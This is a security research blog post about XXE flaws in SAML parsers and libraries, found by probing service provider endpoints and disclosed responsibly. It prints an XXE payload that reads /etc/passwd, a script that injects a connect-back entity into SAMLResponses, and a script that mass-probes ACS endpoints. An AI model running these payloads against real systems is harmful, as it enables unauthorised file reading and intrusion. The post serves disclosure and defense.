Down the SAML Code


Working for an identity company like Okta forces you to constantly be aware of new, old and obscure authentication methods — and also encourages you to dive deep into the underlying protocol to discover whether engineers have correctly implemented the technology. Okta’s Research & Exploitation Team does exactly that, by researching commonly used libraries, protocols and security methods. At Okta we work by the idea that security is not just about how good your code is — it’s about securing the destination services to which customers connect.


SAML is one of the most widely used authentication technologies. Because SAML is essentially XML, most developers either rely on third-party XML parsers or write their own to parse SAML payloads. Either approach can introduce security problems. XML is a feature-rich format that can be exploited in several ways. For example, XML External Entity (XXE) injection is a vulnerability that allows an attacker to make the parser load remote entities and read local files, among other issues.
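To make the XXE idea concrete, here is a minimal sketch of what such a payload looks like and of one conservative defense: refusing any document that carries a DOCTYPE before it reaches the real SAML parser. The names `XXE_SAMPLE`, `DoctypeForbidden` and `reject_doctype` are hypothetical, chosen for illustration only, and this is not the check used by any of the libraries discussed in this post.

```python
import xml.parsers.expat

# Illustrative XXE payload: the DOCTYPE declares an external entity that
# points at a local file, and the document body references that entity.
XXE_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<r>&xxe;</r>"""


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Scan the document with expat and raise if it declares a DOCTYPE.

    SAML messages have no legitimate need for a DTD, so this sketch
    assumes that rejecting every DOCTYPE outright is acceptable.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort as soon as the DOCTYPE is seen, before entities are used.
        raise DoctypeForbidden(f"DOCTYPE declaration found for {name!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)
```

Calling `reject_doctype(XXE_SAMPLE)` raises `DoctypeForbidden`, while a plain document such as `b"<r>ok</r>"` passes through. Rejecting the DOCTYPE entirely is stricter than disabling entity resolution, but it avoids depending on how a particular parser treats entities.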

Back in August, we found that a vendor application we used was vulnerable to an XXE attack. After finding it, we created a proper write-up and followed up with the company's security team using our Responsible Vulnerability Disclosure process. At the same time, we asked ourselves, "If they are vulnerable, who else is vulnerable?"

Given that most Java XXE vulnerabilities were reported back in 2013, we didn’t expect to find many security problems. Even so, we wanted to retest all known SAML SP endpoints. Since we work for a cloud identity provider, we started with our own resources, which include one of the biggest SAML integration lists in the world. That gave us plenty of ACS (Assertion Consumer Service) endpoints to start testing, and Google queries helped as well.


We started by performing manual tests using a custom proxy and replacing the SAMLResponse with a simple malicious XML document. We did this by running the original response through a script that injects a PoC XXE payload, which tries to connect back to an HTTP server we were hosting. To our surprise, a few hours later, we had found several new vulnerable services and appliances.
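The injection step can be sketched roughly as follows. This is not the script we used; it is a minimal illustration that assumes the SAMLResponse arrives Base64-encoded (as in the HTTP POST binding) and that the PoC is an external parameter entity pointing at a server you control. `CALLBACK_URL` and `inject_xxe` are hypothetical names, and the sketch should only be pointed at systems you are authorized to test.

```python
import base64
import re

# Hypothetical callback server; replace with a host you control.
CALLBACK_URL = "http://callback.example.invalid/xxe"


def inject_xxe(saml_response_b64: str, callback_url: str = CALLBACK_URL) -> str:
    """Return a Base64 SAMLResponse with a connect-back DOCTYPE injected."""
    xml = base64.b64decode(saml_response_b64).decode("utf-8")

    # Keep the XML declaration (if any) first; a DOCTYPE must follow it.
    decl = re.match(r"\s*<\?xml[^>]*\?>", xml)
    prolog = decl.group(0) if decl else ""
    body = xml[len(prolog):]

    # Use the root element name (for example samlp:Response) as the DOCTYPE
    # name. A regex is enough for a sketch; it does not handle odd prologs.
    root = re.search(r"<([A-Za-z_][\w.\-]*(?::[\w.\-]+)?)", body)
    if root is None:
        raise ValueError("no root element found in SAMLResponse")

    # External parameter entity: a vulnerable parser fetches callback_url.
    doctype = (
        f'<!DOCTYPE {root.group(1)} '
        f'[<!ENTITY % xxe SYSTEM "{callback_url}"> %xxe;]>'
    )
    return base64.b64encode((prolog + doctype + body).encode("utf-8")).decode("ascii")
```

A request to the callback server after the modified response is submitted suggests that the service provider's parser resolved the external entity.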

Manual testing got old very fast. Intercepting each request (MiTM) and editing each SAMLResponse by hand was not fun, and we soon realized we could automate this with a fake static response. The process went much faster after that.
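A rough sketch of that automation, under stated assumptions: the same fixed, unsigned response is Base64-encoded and posted as the `SAMLResponse` form field to each ACS endpoint, and any hit is observed on the callback server rather than in the HTTP reply. `STATIC_XML`, `build_probe`, `send_probe` and the example URLs are hypothetical and are not taken from our actual tooling.

```python
import base64
import urllib.error
import urllib.parse
import urllib.request

# Hypothetical static response carrying a connect-back DOCTYPE.
STATIC_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE Response [<!ENTITY % xxe SYSTEM '
    '"http://callback.example.invalid/xxe"> %xxe;]>'
    '<Response/>'
)


def build_probe(acs_url: str, xml: str = STATIC_XML) -> urllib.request.Request:
    """Build the form POST that delivers the static response to one endpoint."""
    encoded = base64.b64encode(xml.encode("utf-8")).decode("ascii")
    form = urllib.parse.urlencode({"SAMLResponse": encoded}).encode("ascii")
    return urllib.request.Request(
        acs_url,
        data=form,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def send_probe(acs_url: str, timeout: float = 10.0):
    """Send the probe and return the HTTP status, or None if unreachable."""
    try:
        with urllib.request.urlopen(build_probe(acs_url), timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        # Most endpoints reject the fake response; the status is still useful.
        return exc.code
    except urllib.error.URLError:
        return None
```

Looping `send_probe` over a list of endpoints replaces the proxy-and-edit cycle. The HTTP status says little on its own, since a vulnerable parser may fetch the entity and then still reject the unsigned response.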

At the same time, we found that pySAML was vulnerable to XXE. After carefully reviewing its code, however, we realized the problem was not in pySAML itself but in one of the dependencies it uses to sign and verify messages. XMLSEC1, a core library used by several other libraries, was susceptible to XXE.

We first reported the vulnerability to the pySAML GitHub repository, given that a fix could be implemented at the Python level. But the more we looked into the code, the more it seemed that XMLSEC was responsible. This led us to create yet another vulnerability report. While writing up that issue, we finally came to the conclusion that it was not entirely XMLSEC's fault either. XMLSEC uses libXML, a core library from the GNOME project. Even though XXE problems had already been reported and fixed in that library, this was a previously undiscovered vulnerable path.

We still reported the issue to XMLSEC, because we felt a fix was possible at the XMLSEC layer and that XMLSEC was responsible for correctly parsing and filtering this input. A few hours later, the XMLSEC developer opened a ticket with libXML, independently confirming that the problem was indeed in libXML.

Final Thoughts

To recap: we not only found several vulnerable cloud applications, but also found an XXE in a core library and in several SAML libraries (pySAML, xmlSEC, go-SAML, etc.). This was an interesting bug to stumble upon, and now it's your turn to use the GitHub Gist script to test your custom apps and third-party code and make the internet less vulnerable.

For more on this vulnerability discovery, please read my in-depth blog post.